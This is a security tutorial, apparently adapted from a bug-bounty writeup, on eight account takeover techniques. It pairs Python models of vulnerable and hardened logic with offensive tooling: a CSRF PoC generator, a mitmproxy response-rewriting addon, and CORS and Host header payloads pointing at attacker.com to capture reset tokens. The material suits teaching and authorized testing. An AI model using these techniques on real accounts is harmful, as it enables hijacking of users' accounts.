Firing 8 Account Takeover Methods 🔥
1. Unicode Normalization Issue
- Victim account: [email protected]
- Register a second account whose address uses Unicode look-alike characters, for example: vić[email protected]
- The bug is a canonicalization mismatch: the uniqueness check at signup compares the raw string, but a later step (login lookup, password reset, notification delivery) normalizes the address (NFKC, case folding, accent stripping) and the look-alike collapses to the victim's address.
- List of Unicode characters: https://en.wikipedia.org/wiki/List_of_Unicode_characters
- Note: look for flows where e-mail verification is not required, otherwise the look-alike account never becomes usable.
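The collision described above, as an added example that is not part of the original writeup or 0xMaruf's code. It models a constructed in-memory user table and two canonicalizations an application might apply (NFKC + lowercase, and NFKD accent stripping); the vulnerable signup checks uniqueness on the raw string while the lookup canonicalizes, and the hardened signup canonicalizes first and refuses non-ASCII addresses. The addresses are constructed sample data.

```python
import unicodedata

# Two canonicalizations an application might apply to e-mail addresses.
def nfkc_lower(email: str) -> str:
    """NFKC then lowercase: collapses compatibility look-alikes (ⓥ, ｖ, ﬁ ...)."""
    return unicodedata.normalize("NFKC", email).lower()

def strip_accents(email: str) -> str:
    """NFKD, drop combining marks, lowercase: collapses accented letters (ć -> c)."""
    decomposed = unicodedata.normalize("NFKD", email)
    return "".join(ch for ch in decomposed if unicodedata.category(ch) != "Mn").lower()

def register_vulnerable(users: dict, email: str, owner: str) -> str:
    """Uniqueness is checked on the raw string, so a look-alike address passes."""
    if email in users:
        raise ValueError("already registered")
    users[email] = owner
    return email

def find_accounts(users: dict, email: str, canon) -> list:
    """Lookup used later by login / password reset / notifications: it canonicalizes
    both sides, so the victim's row and the look-alike row both match. Many
    applications silently take the first match."""
    wanted = canon(email)
    return [owner for stored, owner in users.items() if canon(stored) == wanted]

def register_hardened(users: dict, email: str, owner: str, canon) -> str:
    """Canonicalize *before* the uniqueness check, and reject addresses that are
    not already in canonical ASCII form."""
    canonical = canon(email)
    if not email.isascii() or canonical != email.lower():
        raise ValueError("non-canonical address rejected")
    if canonical in users:
        raise ValueError("already registered")
    users[canonical] = owner
    return canonical

if __name__ == "__main__":
    # Constructed data: the victim's row first, then the attacker's look-alike.
    users = {}
    register_vulnerable(users, "victim@example.com", "victim")
    register_vulnerable(users, "\u24e5ictim@example.com", "attacker")   # ⓥ -> v under NFKC
    print(find_accounts(users, "\u24e5ictim@example.com", nfkc_lower))  # ['victim', 'attacker']
    print(strip_accents("vi\u0107tim@example.com"))                     # victim@example.com
```

Which canonicalization the target uses decides which characters to try: circled, full-width and ligature forms only fold under NFKC, while an accented ć only folds if the application strips diacritics, so test both families.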
2. Authorization Issue
- In account A, change the e-mail address to an address B that you control.
- Check the confirmation mail that arrives in mailbox B.
- Open the confirmation link while logged in as a different account C (in practice, the victim opens it while logged in).
- If the link acts on whatever session opens it instead of on the account that requested the change, account C's e-mail is now B, an address you control: account C is taken over.
3. Reusing Reset Token
- If the target does not invalidate reset links after use, old links are still live: hunt for historical reset URLs with gau, the Wayback Machine or urlscan.io.
- Also check whether issuing a new reset link invalidates the earlier ones, and whether a link can be reused after the password has already been changed.
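Methods 2 and 3 are the same server-side defect seen twice: a token that is not bound to the account that requested it, and a token that is never invalidated. The following is an added example (not from the original writeup or 0xMaruf's code) with a constructed in-memory token store; the vulnerable handlers only check that the token exists and apply the e-mail change to whoever is logged in, while the hardened handlers bind the token to its owner, enforce a time limit and make it single-use.

```python
import secrets
import time
from typing import Optional

class TokenStore:
    """Constructed example: server-side store for e-mail-change and reset tokens."""

    def __init__(self, ttl_seconds: int = 900, clock=time.time):
        self._tokens = {}
        self.ttl = ttl_seconds
        self.clock = clock

    def issue(self, kind: str, user_id: str, target: Optional[str] = None) -> str:
        token = secrets.token_urlsafe(32)
        self._tokens[token] = {"kind": kind, "user_id": user_id, "target": target,
                               "expires": self.clock() + self.ttl, "used": False}
        return token

    def lookup(self, token: str, kind: str) -> dict:
        """What the vulnerable handlers do: an existence check and nothing else."""
        rec = self._tokens.get(token)
        if rec is None or rec["kind"] != kind:
            raise PermissionError("unknown token")
        return rec

    def consume(self, token: str, kind: str, session_user_id: Optional[str]) -> dict:
        """Hardened: single use, time limited, bound to the account that requested it."""
        rec = self.lookup(token, kind)
        if rec["used"] or rec["expires"] < self.clock():
            raise PermissionError("token expired or already used")
        if session_user_id is not None and rec["user_id"] != session_user_id:
            raise PermissionError("token was issued to a different account")
        rec["used"] = True
        return rec

# Method 2: e-mail change confirmation.
def confirm_email_vulnerable(store, accounts, token, session_user):
    rec = store.lookup(token, "email_change")
    accounts[session_user]["email"] = rec["target"]    # applies to whoever is logged in
    return accounts[session_user]["email"]

def confirm_email_hardened(store, accounts, token, session_user):
    rec = store.consume(token, "email_change", session_user)
    accounts[rec["user_id"]]["email"] = rec["target"]  # applies to the requesting account only
    return accounts[rec["user_id"]]["email"]

# Method 3: password reset.
def reset_password_vulnerable(store, accounts, token, new_password):
    rec = store.lookup(token, "reset")                 # never invalidated: old links keep working
    accounts[rec["user_id"]]["password"] = new_password

def reset_password_hardened(store, accounts, token, new_password):
    rec = store.consume(token, "reset", None)          # one use, then dead
    accounts[rec["user_id"]]["password"] = new_password
```

When testing a real target, the observable symptoms are the same as in the model: a confirmation link that changes the e-mail of whichever session opens it, and a reset link that still works on its second visit or after a newer link was issued.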
4. Pre Account Takeover
- Sign up with the victim's e-mail address through the normal signup form and set a password of your choice; the verification link goes to the victim's mailbox, so the attacker never verifies.
- The victim later signs up with the same address via OAuth.
- If the application links the OAuth identity to the existing unverified row instead of discarding it, the row becomes verified and the attacker can log in with the password set at registration, no verification link needed.
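The account-linking decision that makes this work, as an added example (not from the original writeup or 0xMaruf's code) over a constructed in-memory user table. The vulnerable OAuth handler merges into any existing row with the same e-mail and marks it verified, leaving the attacker's password in place; the hardened handler drops an unverified pre-registration before linking. Login is modelled as blocked until the address is verified, which is what gives the attacker a reason to wait for the victim.

```python
import hmac

def password_signup(users, email, password):
    """Attacker's move: ordinary signup with the victim's address; the verification
    mail goes to the victim, so this row stays unverified."""
    users[email] = {"password": password, "verified": False, "oauth": None}
    return users[email]

def password_login(users, email, password):
    """Login is refused until the address is verified (common policy)."""
    user = users.get(email)
    if not user or not user["verified"] or user["password"] is None:
        return False
    return hmac.compare_digest(user["password"], password)

def oauth_login_vulnerable(users, email, provider_subject):
    """Links the OAuth identity to any existing row with that e-mail, verified or not.
    The provider vouched for the address, so the row is marked verified, and the
    attacker's password survives the merge."""
    user = users.setdefault(email, {"password": None, "verified": False, "oauth": None})
    user["oauth"] = provider_subject
    user["verified"] = True
    return user

def oauth_login_hardened(users, email, provider_subject):
    """Only links to rows whose e-mail was verified; an unverified pre-registration
    is discarded together with its password (alternatively, force an e-mail
    confirmation or a password reset before linking)."""
    existing = users.get(email)
    if existing is not None and not existing["verified"]:
        users.pop(email)
    user = users.setdefault(email, {"password": None, "verified": True, "oauth": None})
    user["oauth"] = provider_subject
    return user

if __name__ == "__main__":
    users = {}
    password_signup(users, "victim@example.com", "attacker-pw")
    print(password_login(users, "victim@example.com", "attacker-pw"))   # False
    oauth_login_vulnerable(users, "victim@example.com", "idp:12345")    # victim signs up via OAuth
    print(password_login(users, "victim@example.com", "attacker-pw"))   # True
```

To test a target, register with an address you control, do not click the verification link, then sign in with OAuth using that address and check whether your original password still works.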
5. CORS Misconfiguration to Account Takeover
- Check the API for endpoints that return an access token, session identifier, secret or device fingerprint in the response body.
- If there are any, test the CORS configuration: does the server reflect an arbitrary Origin (or "null", or a look-alike of its own domain) in Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true?
- If so, host a page that fetches the endpoint with credentials, reads the token out of the response and replays it with your own headers.
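The check behind "does it allow us to fetch data", as an added example (not from the original writeup or 0xMaruf's code). It models three server-side CORS policies (reflect everything, suffix match, exact-match allowlist) against a constructed allowlist, plus a function that decides from the response headers whether a page on the attacker's origin could read an authenticated response, and a list of Origin values worth sending. The hostnames are assumptions.

```python
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}  # assumed allowlist

def cors_reflect(request_origin):
    """Vulnerable: echoes any Origin and allows credentials."""
    return {"Access-Control-Allow-Origin": request_origin,
            "Access-Control-Allow-Credentials": "true"}

def cors_suffix_match(request_origin):
    """Vulnerable: 'ends with our domain' also accepts https://evilexample.com."""
    if request_origin.endswith("example.com"):
        return cors_reflect(request_origin)
    return {}

def cors_allowlist(request_origin):
    """Hardened: exact-match allowlist, Vary: Origin so caches do not mix responses."""
    if request_origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": request_origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}

def exploitable(response_headers, attacker_origin):
    """True when a page on attacker_origin can read an authenticated response:
    ACAO must equal the attacker origin (or 'null') and credentials must be allowed.
    '*' is never enough: browsers refuse credentialed requests to a wildcard."""
    h = {k.lower(): v for k, v in response_headers.items()}
    allow_credentials = h.get("access-control-allow-credentials", "").strip().lower() == "true"
    return allow_credentials and h.get("access-control-allow-origin") in (attacker_origin, "null")

def probe_origins(target_host, attacker_host="attacker.com"):
    """Origin values worth sending in the intercepted request, one at a time."""
    return [f"https://{attacker_host}",                # plain reflection
            "null",                                     # sandboxed iframe sends Origin: null
            f"https://{target_host}.{attacker_host}",   # prefix match
            f"https://evil{target_host}",               # suffix match
            f"http://{target_host}"]                    # scheme downgrade

if __name__ == "__main__":
    for origin in probe_origins("example.com"):
        for policy in (cors_reflect, cors_suffix_match, cors_allowlist):
            print(f"{policy.__name__:18} {origin:35} exploitable={exploitable(policy(origin), origin)}")
```

Send each probe origin in the Origin header of the intercepted request and run `exploitable` over the response headers; a hit on "null" is exploitable from a sandboxed iframe, a hit on the look-alike origins needs a domain you register.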
6. CSRF to Account Takeover
- If profile modification under cookie-based authentication carries no anti-CSRF token (and the session cookie is not protected by SameSite), the change can be forged from another site.
- Open account A, change the e-mail to an address you own, click save, intercept the request and generate a CSRF PoC from it.
- If authentication is fully cookie based you do not need to modify anything: send the CSRF file to the victim.
- If the request requires a UUID/UserID or another unique token it becomes harder, but that does not mean it is secure; keep playing with the target.
- Hint: the password reset page often leaks the UUID/GUID or UserID you need.
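A small generator for the CSRF PoC, plus the check that decides whether the request can be forged blind, as an added example that is not part of the original writeup or 0xMaruf's tooling. It turns an intercepted form-encoded request into an auto-submitting HTML page and flags parameters (UUIDs, long random tokens) that a forged request could not supply without a per-victim leak such as the reset page mentioned above. The target URL and parameters below are constructed sample data.

```python
import re
from html import escape
from urllib.parse import parse_qsl, urlsplit

UUID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)
TOKEN_RE = re.compile(r"^[A-Za-z0-9_\-+/=]{16,}$")   # long opaque values: CSRF tokens, session ids

def csrf_poc(method, url, body="", content_type="application/x-www-form-urlencoded"):
    """Build an auto-submitting HTML page that replays an intercepted request.
    The browser attaches the victim's cookies, which is the whole attack."""
    method = method.upper()
    if content_type.split(";")[0].strip() != "application/x-www-form-urlencoded":
        raise ValueError("only form-encoded bodies can be replayed by a plain HTML form")
    parts = urlsplit(url)
    fields = list(parse_qsl(body, keep_blank_values=True))
    action = url
    if method == "GET":                                  # query string becomes hidden inputs
        fields = list(parse_qsl(parts.query, keep_blank_values=True)) + fields
        action = parts._replace(query="").geturl()
    inputs = "\n".join(
        f'    <input type="hidden" name="{escape(k, quote=True)}" value="{escape(v, quote=True)}">'
        for k, v in fields)
    return (f'<html><body>\n'
            f'  <form id="f" action="{escape(action, quote=True)}" method="{method}">\n'
            f'{inputs}\n'
            f'  </form>\n'
            f'  <script>document.getElementById("f").submit();</script>\n'
            f'</body></html>')

def unguessable_fields(fields):
    """Names of parameters a forged request could not know in advance.
    An empty list means the request is forgeable as-is; otherwise look for a
    leak of those values (the reset page, a public profile, an API response)."""
    return [name for name, value in fields.items()
            if UUID_RE.match(value) or TOKEN_RE.match(value)]

if __name__ == "__main__":
    # Constructed sample request: a profile update that only carries cookies.
    print(csrf_poc("POST", "https://target.example/profile",
                   "email=attacker%40example.com&name=Bob"))
    print(unguessable_fields({"email": "attacker@example.com", "user_id": "1042"}))  # []
```

A short numeric user_id, as in the sample, is guessable or enumerable and does not protect the request; only an unpredictable per-session token or a SameSite cookie does.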
7. Host Header Injection
- There are four ways to try this.
- Request a password reset and change the Host header to attacker.com.
- Or change a proxy header, e.g. X-Forwarded-For: attacker.com (X-Forwarded-Host is the proxy header most link builders actually read, while X-Forwarded-For normally carries only the client IP, so try both).
- Or change the Host, Referer and Origin headers to attacker.com all at once.
- Request a reset, then click "resend mail" and repeat the three methods above on the resend request.
- Success looks like a reset e-mail whose link points at attacker.com: when the victim opens it, the reset token arrives in your server log.
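Why the header variants work, as an added example that is not part of the original writeup or 0xMaruf's code. It models a reset-link builder that takes the host from the request (proxy header first, as many framework URL helpers do) against one that validates the host against an allowlist and builds the link from configuration, and runs the four header sets from the section through both. The canonical host, allowlist and attempts are constructed assumptions.

```python
from urllib.parse import urlsplit

CANONICAL_BASE = "https://app.example.com"   # assumed config value
ALLOWED_HOSTS = {"app.example.com"}          # assumed allowlist

def reset_link_vulnerable(headers, token):
    """Builds the link from the request, honouring the proxy header first."""
    h = {k.lower(): v for k, v in headers.items()}
    host = h.get("x-forwarded-host") or h.get("host")
    return f"https://{host}/reset?token={token}"

def host_allowed(headers):
    """Hardened request check: every host-bearing header must be on the allowlist."""
    h = {k.lower(): v for k, v in headers.items()}
    for name in ("host", "x-forwarded-host"):
        if name in h and h[name].split(":")[0] not in ALLOWED_HOSTS:
            return False
    return True

def reset_link_hardened(headers, token):
    """Rejects untrusted hosts and never derives the link from the request."""
    if not host_allowed(headers):
        raise ValueError("untrusted Host / X-Forwarded-Host")
    return f"{CANONICAL_BASE}/reset?token={token}"

def poisoned(link, attacker="attacker.com"):
    """Does the link send the victim (and the token) to the attacker's host?"""
    return urlsplit(link).hostname == attacker

# The header sets from the section, in order: Host only, proxy header (X-Forwarded-For),
# proxy header (X-Forwarded-Host), and Host + Referer + Origin together.
ATTEMPTS = [
    {"Host": "attacker.com"},
    {"Host": "app.example.com", "X-Forwarded-For": "attacker.com"},
    {"Host": "app.example.com", "X-Forwarded-Host": "attacker.com"},
    {"Host": "attacker.com", "Referer": "https://attacker.com/", "Origin": "https://attacker.com"},
]

if __name__ == "__main__":
    for headers in ATTEMPTS:
        link = reset_link_vulnerable(headers, "t0k3n")
        print(f"{poisoned(link)!s:5} {link}   <- {headers}")
```

In this model X-Forwarded-For alone does nothing because the builder never reads it, which is the usual outcome on real targets too; X-Forwarded-Host and a raw Host change are the variants that most often produce a poisoned link. Whether "resend mail" reuses the stored host from the first request or reads the headers again is exactly what the fourth attempt finds out.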
8. Response Manipulation
- Status code manipulation: change the response status from * to 200 OK.
- Status code and body manipulation: change the status from * to 200 OK and the body from * to {"success":true} or {}.
- This works when JSON is used to transfer and receive data and the client decides what to show (or which step to unlock) from the response body, instead of the server enforcing the decision on its side.
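The two manipulations as an interception script, added here as an example that is not part of the original writeup or 0xMaruf's tooling. The rewriting logic is a plain function so it can be tested offline; the `response` hook at the bottom is the mitmproxy addon entry point (assumed usage: `mitmdump -s response_manipulation.py`). The path pattern is an assumption to be edited for the target, and only JSON responses are touched, matching the note above.

```python
import json
import re

# Assumed: only responses on these paths are rewritten; edit for the target.
TARGET_PATHS = re.compile(r"/(login|verify|otp|mfa|2fa)(/|\?|$)")

def rewrite(status_code, content_type, body, mode="status+body"):
    """Apply the manipulation from the section to one response.
    mode="status": only the status code becomes 200 OK.
    mode="status+body": the status becomes 200 and a JSON failure body becomes {"success": true}.
    Non-JSON responses are returned untouched."""
    if "application/json" not in content_type.lower():
        return status_code, body
    if mode == "status":
        return 200, body
    try:
        data = json.loads(body) if body.strip() else {}
    except json.JSONDecodeError:
        return 200, body
    failed = status_code >= 400 or (
        isinstance(data, dict) and (data.get("success") is False or "error" in data))
    new_body = json.dumps({"success": True}) if failed else body
    return 200, new_body

def response(flow):
    """mitmproxy hook: called once per server response."""
    if flow.response is None or not TARGET_PATHS.search(flow.request.path):
        return
    status, body = rewrite(flow.response.status_code,
                           flow.response.headers.get("content-type", ""),
                           flow.response.get_text(strict=False) or "",
                           mode="status+body")
    flow.response.status_code = status
    flow.response.text = body
```

If the client then shows the logged-in or verified state, the authorization decision lives in the client; the fix is for the server to issue the session or mark the step complete only after its own check succeeds, never on the basis of what the client believes.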
Credit
Based on 0xMaruf's writeup.